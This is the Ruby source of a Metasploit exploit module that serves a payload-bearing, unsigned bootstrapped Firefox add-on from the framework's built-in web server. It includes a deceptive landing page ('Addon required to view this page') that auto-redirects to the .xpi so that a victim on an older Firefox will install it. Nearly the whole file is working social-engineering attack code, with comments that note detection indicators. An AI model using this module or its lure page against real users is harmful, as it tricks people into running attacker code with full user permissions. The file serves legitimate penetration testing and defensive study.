Path: blob/master/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

# Social-engineering module that serves an unsigned, bootstrapped legacy
# Firefox add-on (.xpi) from the framework's built-in HTTP server.
#
# Nothing here exploits a memory-safety bug: the add-on only runs if the user
# accepts Firefox's install prompt. Per the module description, release builds
# of Firefox 41+ refuse unsigned add-ons, and legacy extensions are not
# supported from Firefox 57 onward.
#
# Observable behaviour visible in this file (useful for detection and triage):
# * the landing page meta-refreshes to a relative `addon.xpi` URL;
# * the add-on is returned with `Content-Type: application/x-xpinstall`;
# * the module's own Notes declare IOC_IN_LOGS, ARTIFACTS_ON_DISK and
#   SCREEN_EFFECTS as side effects.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  # Registers the module metadata (name, description, references, notes).
  #
  # @param info [Hash] metadata supplied by the caller, merged via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
      'Description' => %q{
        Mozilla Firefox before version 41 allowed users to install
        unsigned browser extensions from arbitrary web servers.

        This module dynamically creates an unsigned .xpi addon file.
        The resulting bootstrapped Firefox addon is presented to
        the victim via a web page. The victim's Firefox browser
        will pop a dialog asking if they trust the addon.

        Once the user clicks "install", the addon is installed and
        executes the payload with full user permissions. As of Firefox
        4, this will work without a restart as the addon is marked to
        be "bootstrapped". As the addon will execute the payload after
        each Firefox restart, an option can be given to automatically
        uninstall the addon once the payload has been executed.

        As of Firefox 41, unsigned extensions can still be installed
        on Firefox Nightly, Unbranded and Development builds when
        configured with `xpinstall.signatures.required` set to `false`.

        Note: this module generates legacy extensions which are
        supported only in Firefox before version 57.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'mihi', 'joev' ],
      'DisclosureDate' => '2007-06-27',
      'References' => [
        [ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],
        [ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],
        [ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],
        [ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],
        [ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
      ],
      'Notes' => {
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
        'Stability' => [CRASH_SAFE]
      }
    )

    super(module_info)
  end

  # HTTP request callback. Routes on the request URI:
  # * URI ending in ".xpi" (case-insensitive): build and return the add-on,
  #   or answer "not found" when generation fails;
  # * URI ending in "/": return the landing page from #generate_html;
  # * anything else: redirect to the resource path with a trailing slash, so
  #   the page's relative `addon.xpi` link resolves under that path.
  #
  # handler(cli) runs after every branch, including redirects.
  #
  # @param cli the client connection object passed in by the HTTP server mixin
  # @param request the incoming request; only `request.uri` is read here
  def on_request_uri(cli, request)
    if request.uri.match?(/\.xpi$/i)
      print_status("Sending xpi and waiting for user to click 'accept'...")

      # generate_addon_xpi is not defined in this file; presumably it comes
      # from the FirefoxAddonGenerator mixin. A falsy result means failure.
      xpi = generate_addon_xpi(cli)
      if xpi
        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
      else
        print_error("Failed to generate the payload.")
        send_not_found(cli)
      end
    elsif request.uri.match?(%r{/$})
      print_status("Sending HTML response.")
      send_response_html(cli, generate_html)
    else
      print_status("Redirecting request.")
      send_redirect(cli, "#{get_resource}/")
    end

    handler(cli)
  end

  # Builds the static landing page: a zero-delay meta refresh to `addon.xpi`
  # plus a visible "[Install]" link to the same relative URL.
  #
  # @return [String] the HTML document
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title>\n|,
      %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|,
      %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|,
      %Q|</body></html>|
    ].join
  end
end